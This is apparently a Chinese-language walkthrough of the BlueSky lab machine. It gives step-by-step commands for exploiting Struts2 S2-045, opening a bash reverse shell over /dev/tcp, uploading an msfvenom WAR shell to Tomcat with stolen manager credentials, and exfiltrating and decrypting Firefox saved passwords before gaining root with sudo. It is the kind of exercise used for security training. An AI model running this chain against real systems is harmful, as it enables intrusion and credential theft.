bluesky

靶机 BlueSky

信息搜集

存活检测

详细扫描

• 发现开放了 22 端口和 8080 端口

  

• 访问 8080 端口

  

  查看源代码未发现有用信息

• 后台扫描

• 无有用信息

漏洞复现

• 搜索漏洞，存在 struts 远程代码执行漏洞

  路径 http://192.168.245.144:8080/struts2-showcase/index.action

  

• 启动漏洞扫描工具 vulmap

  python3 vulmap.py 
  

  

  搜索 struts 漏洞

  python3 vulmap.py -u http://192.168.245.144:8080/struts2-showcase/index.action -a struts2
  

  

  显示存在漏洞

• msf 搜索漏洞

  search s2-045
  

  

• 配置并运行

  

  成功连接

  

• 反弹 shell

  bash -c 'bash -i >& /dev/tcp/192.168.245.128/8888 0>i'
  

Webshell

• 查看viminfo文件 在vim中操作的行为，vim会自动记录下来，保存在 .viminfo 文件中。

  

• 查看 /usr/local/tomcat/conf/tomcat-users.xml

  cat /usr/local/tomcat/conf/tomcat-users.xml
  

  获得了 admin 的账号密码

  

• 登录 manager app

  

  输入账号 admin 密码 6mzf3>gfZ.pN8_Mp

• 登陆成功

  

• 尝试文件上传反弹 shell

  

• 生成后缀未 war 的反弹文件

  msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.245.128 LPORT=8888 -f war -o shell.war
  

  

• 上传成功

  

• 开启监听，点击 shell.war 连接

  

提权

• 提示符回显

  /usr/bin/script -qc /bin/bash /dev/null
  

  

mozilla firefox信息收集

• 发现 Firefox 文件 .mozilla

  

• 查找用户密码文件

  

• 将两个文件下载到 kali 进行解密

  python3 -m http.server 6666
  

  

• kali 下载

  wget http://192.168.245.144:6666/key4.db
  wget http://192.168.245.144:6666/logins.json
  

  

密码解密

• 下载解密脚本

• 查看用法

  

• 下载依赖文件

  pip3 install -r rewuirements.txt
  

  

• 将 key4.db 和 logins.json 复制到 firepwd.py 同目录下

• 运行 firepwd 文件

  python firepwd.py
  

• 得到账号 minhtuan 密码 skysayohyeah

  

• sudo -l 查看权限

  输入密码

  

• 拥有全部 root 权限

• 提权

  sudo bash
  

  

  提权成功